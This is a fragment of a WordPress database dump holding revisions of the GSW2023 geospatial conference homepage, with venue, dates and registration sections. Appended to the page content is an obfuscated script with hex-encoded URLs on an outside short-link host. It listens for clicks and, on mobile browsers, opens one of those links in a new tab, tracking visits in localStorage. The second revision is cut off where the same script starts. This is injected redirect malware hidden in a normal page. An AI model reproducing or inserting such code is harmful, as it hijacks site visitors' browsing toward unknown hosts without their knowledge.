-o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>INTERCONTINENTAL CAIRO SEMIRAMIS</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>MORE INFORMATION</strong></h4>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Office of the Vice President of the Academy for Graduate Studies and Scientific Research</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-11 22:12:09','2022-11-11 22:12:09','',3066,'https://gsw2023.com/?p=3313',0,'revision','',0),
(3314,1,'2022-11-11 22:13:29','2022-11-11 22:13:29','<p>[vc_row css=\".vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[rev_slider alias=\"gsw2023-1\" slidertitle=\"gsw23\"][/rev_slider]</p>\n<h3></h3>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668024005657{margin-top: 25px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner][vc_column_text]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][/vc_column_inner][/vc_row_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1668021106220{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): March 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668020734563{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPAER:SOON[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3162\" img_size=\"1149x800\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>INTERCONTINENTAL CAIRO SEMIRAMIS</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>MORE INFORMATION</strong></h4>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Office of the Vice President of the Academy for Graduate Studies and Scientific Research</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const 